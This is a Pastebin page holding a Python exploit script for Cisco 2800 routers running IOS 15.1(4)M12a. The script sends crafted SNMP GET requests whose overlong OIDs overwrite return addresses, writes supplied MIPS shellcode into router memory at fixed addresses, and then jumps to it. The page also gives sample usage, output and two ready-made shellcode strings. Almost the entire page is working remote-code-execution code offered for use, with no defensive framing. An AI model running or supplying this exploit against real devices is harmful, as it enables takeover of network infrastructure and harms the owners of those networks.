API tools faq
paste
Advertisement
xB4ckdoorREAL

[CISCO EXPLOIT SHELLCODE]

xB4ckdoorREAL
Nov 4th, 2018
1,411
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.10 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. # DISCORD: https://discord.gg/PTW3yPp
  3. if False: '''
  4.  
  5. ```
  6. $ sudo python c2800nm-adventerprisek9-mz.151-4.M12a.py 192.168.88.1 public 8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
  7. Writing shellcode to 0x8000f000
  8. .
  9. Sent 1 packets.
  10. 0x8000f0a4: 8fb40250    lw  $s4, 0x250($sp)
  11. .
  12. Sent 1 packets.
  13. 0x8000f0a8: 00000000    nop
  14. .
  15. Sent 1 packets.
  16. 0x8000f0ac: 3c163e29    lui $s6, 0x3e29
  17. .
  18. Sent 1 packets.
  19. 0x8000f0b0: 36d655b0    ori $s6, $s6, 0x55b0
  20. ```
  21.  
  22.  
  23. $ snmpget -v 2c -c public 192.168.88.1 1.3.6.1.2.1.1.1.0
  24.  
  25. SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
  26. ```
  27.  
  28. ## Shellcode
  29. 8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
  30.  
  31. ## unset_shellcode
  32. 8fb40250000000003c163e2936d655b026d620000000000002d4a821000000003c1480003694f0008e96000000000000aeb60000000000003c1fbfc437ff89a803e0000800000000
  33. '''
  34.  
  35. from scapy.all import *
  36. from time import sleep
  37. from struct import pack, unpack
  38. import random
  39. import argparse
  40. import sys
  41. from termcolor import colored
  42.  
  43.  
  44. try:
  45.     cs = __import__('capstone')
  46. except ImportError:
  47.     pass
  48.  
  49. def bin2oid(buf):
  50.     return ''.join(['.' + str(unpack('B',x)[0]) for x in buf])
  51.  
  52. def shift(s, offset):
  53.     res = pack('>I', unpack('>I', s)[0] + offset)
  54.     return res
  55.  
  56.  
  57.  
  58. alps_oid = '1.3.6.1.4.1.9.9.95.1.3.1.1.7.108.39.84.85.195.249.106.59.210.37.23.42.103.182.75.232.81{0}{1}{2}{3}{4}{5}{6}{7}.14.167.142.47.118.77.96.179.109.211.170.27.243.88.157.50{8}{9}.35.27.203.165.44.25.83.68.39.22.219.77.32.38.6.115{10}{11}.11.187.147.166.116.171.114.126.109.248.144.111.30'
  59. shellcode_start = '\x80\x00\xf0\x00'
  60.  
  61. if __name__ == '__main__':
  62.     parser = argparse.ArgumentParser()
  63.     parser.add_argument("host", type=str, help="host IP")
  64.     parser.add_argument("community", type=str, help="community string")
  65.     parser.add_argument("shellcode", action='store', type=str, help='shellcode to run (in hex)')
  66.     args = parser.parse_args()
  67.  
  68.  
  69.     sh_buf = args.shellcode.replace(' ','').decode('hex')
  70.     print 'Writing shellcode to 0x{}'.format(shellcode_start.encode('hex'))
  71.     if 'capstone' in sys.modules:
  72.         md = cs.Cs(cs.CS_ARCH_MIPS, cs.CS_MODE_MIPS32 | cs.CS_MODE_BIG_ENDIAN)
  73.  
  74.     for k, sh_dword in enumerate([sh_buf[i:i+4] for i in range(0, len(sh_buf), 4)]):
  75.         s0 = bin2oid(sh_dword)  # shellcode dword
  76.         s1 = bin2oid('\x00\x00\x00\x00')
  77.         s2 = bin2oid('\xBF\xC5\xB7\xDC')
  78.         s3 = bin2oid('\x00\x00\x00\x00')
  79.         s4 = bin2oid('\x00\x00\x00\x00')
  80.         s5 = bin2oid('\x00\x00\x00\x00')
  81.         s6 = bin2oid('\x00\x00\x00\x00')
  82.         ra = bin2oid('\xbf\xc2\x2f\x60') # return control flow jumping over 1 stack frame
  83.         s0_2 = bin2oid(shift(shellcode_start, k * 4))
  84.         ra_2 = bin2oid('\xbf\xc7\x08\x60')
  85.         s0_3 = bin2oid('\x00\x00\x00\x00')
  86.         ra_3 = bin2oid('\xBF\xC3\x86\xA0')
  87.          
  88.         payload = alps_oid.format(s0, s1, s2, s3, s4, s5, s6, ra, s0_2, ra_2, s0_3, ra_3)
  89.          
  90.         send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))
  91.  
  92.         cur_addr = unpack(">I",shift(shellcode_start, k * 4 + 0xa4))[0]
  93.         if 'capstone' in sys.modules:
  94.             for i in md.disasm(sh_dword, cur_addr):
  95.                 color = 'green'
  96.                 print("0x%x:\t%s\t%s\t%s" %(i.address, sh_dword.encode('hex'), colored(i.mnemonic, color), colored(i.op_str, color)))
  97.         else:
  98.             print("0x%x:\t%s" %(cur_addr, sh_dword.encode('hex')))
  99.              
  100.         sleep(1)
  101.  
  102.     ans = raw_input("Jump to shellcode? [yes]: ")
  103.  
  104.     if ans == 'yes':
  105.         ra = bin2oid(shift(shellcode_start, 0xa4)) # return control flow jumping over 1 stack frame
  106.         zero = bin2oid('\x00\x00\x00\x00')
  107.         payload = alps_oid.format(zero, zero, zero, zero, zero, zero, zero, ra, zero, zero, zero, zero)
  108.         send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))
  109.         print 'Jump taken!'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!